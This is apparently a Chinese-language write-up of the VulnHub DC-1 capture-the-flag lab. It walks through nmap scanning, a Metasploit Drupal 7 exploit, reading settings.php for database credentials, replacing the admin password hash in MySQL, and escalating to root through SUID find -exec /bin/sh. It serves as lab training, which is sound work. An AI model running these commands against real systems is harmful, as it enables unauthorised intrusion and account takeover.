- DC1环境
1.DC1靶机,下载地址:https://download.vulnhub.com/dc/DC-1.zip
二.开始通关
1.打开虚拟机,进行信息收集
DC1靶机的ip我们不清楚,利用ifconfig查看自己的虚拟机ip
-sP是只扫描在线的主机,不扫描端口nmap -sP 192.168.211.0/24
- 收集信息,查看端口和服务
-A所有信息(系统版本有哪些端口等等)
-v他会给出扫描过程中的详细信息 -p指定地址或端口
nmap -A -p- -v 192.168.***.***(后两位是DC1的IP同样每人不相同)
发现了22算口开放了ssh服务
80端口发现web服务
111端口开放了rpcbind服务
访问web站点(是CD1的ip,不是自己的Ip)
发现是电信的drupal服务通过nmap可得知当前运行的是dtupsl 7的cms
可以去网上搜drupal 7的漏洞
得知需要利用MSF渗透
- 进入MSF控制台,查询drupal模块
进入控制台命令Msfconsol
命令Search drupal
- 选择模块进行测试
这里需要选择2018测试,use选择模块use 1
- 设置靶机(虚拟机这里是CD1的ip)运行MSF
Set rhosts 192.168.***.***(注意是CD1的ip地址)
run运行漏洞
执行whoami显示当前用户权限,然后进入的是shell
发现他是www-data权限,进入home目录下cd /home,ls查看发现有flag4文件,用cd flag4切换到flag4路径下,然后ls查看,发现flag4.txt,用cat flag4.txt进入文件查看
大致意思是没有权限,需要提权
- 这里用Python改变shell的类型
python -c "import pty;pty.spawn('/bin/bash')"
- 发现flag1文件
查看www目录下发现flag1文件,打开发现需要寻找drupal默认路径
Cd /var/www
ls
cat flag1.txt(打开flag1t.t文件)
到浏览器搜索drupal的默认路径
发现drupal的默认的配置文件是
cat /var/www/sites/default//settings.php
发现了flag2与数据库的账号和密码,提示需要提升为root权限
进入数据库
账号‘username’ => ‘dbuser’,
密码‘password’ => ‘R0ck3t’,
mysql -u dbuser -p(需要要输入数据库密码)
进入数据库,再进入到drupaldb数据库
use drupaldb
查询默认的drupal user表
Select * from users;
发现账号,不知道密码
解决方法,置换drupal密码
退出msql进入www目录下
quit;(退出)
在www目录下执行
php scripts/password-hash.sh 新密码(自己设)
然后再进入msql数据库中进行密码替换,进入msql,输入密码在切换到drupaldb数据库
mysql -u dbuser -pR0ck3t(不用在输入密码了-p已经带上了)
use drupaldb(切换到此数据库)
将pass字段进行替换
update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";(有空格)
update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";(没有空格)
- 进入站点输入账号admin (账号固定)密码123(自己设的)
- 进入之后随便看看发现flag3,打开就出现
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
大概的意思就是提权,通过-exec,想到suid授权find
Find / -perm -4000 2>/dev/null(发现find命令)
发现root权限
touch 123(创建新的文件)
Ls(查看)
Find / -name 123 -exec "whoami" \;(查看有没有root权限)
- 发现最后的flag文件
我们切换语句进入shcll,使用whoami查看当前权限,在使用ls查看当前目录下文件
在切换到root目录下ls查看文件,发现thefinalflag.txt文件
Find ./ -name 123 -exec "/bin/sh" \;
Whoami(查看当前权限)Ls(查看)
Cd /root(切换到root目录)Ls(查看)
Cat thefinalflag.txt (打开这个文件)